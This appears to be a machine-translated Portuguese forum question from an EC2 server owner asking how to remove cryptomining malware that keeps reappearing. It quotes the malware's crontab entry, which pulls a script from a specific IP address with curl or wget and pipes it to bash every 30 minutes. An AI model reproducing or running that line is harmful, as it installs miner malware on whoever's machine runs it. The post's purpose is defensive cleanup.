Como limpar o malware de mineração de criptografia que infectou meu servidor Amazon Linux EC2?

Como limpar o malware de mineração de criptografia que infectou meu servidor Amazon Linux EC2?

Nos últimos dias, percebi que os aplicativos em execução na minha instância EC2 Linux estão muito lentos. A execução topdo comando me mostrou que existe um processo /var/tmp/sustseque usa a maior parte da CPU.

Eu matei esse processo. No entanto, após reiniciar a instância, ela começou a funcionar novamente e a utilizar a maior parte da CPU. Ele também está criando entradas cron para o seguinte script:

*/30 * * * *    (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh

Pesquisei no Google e descobri que se trata de um malware de mineração de criptografia. Eu removi seus vestígios de/var/tmp/e removeu as entradas no Crontab. no entanto, essas entradas no Crontab parecem estar voltando de algum lugar e não consegui rastrear a localização exata do script que está fazendo essas entradas.

Também limpei as entradas /var/spool/cron*.

Não encontrei muita informação online para corrigir esse problema. Qualquer ajuda aqui seria muito apreciada.

Desde já, obrigado!!

informação relacionada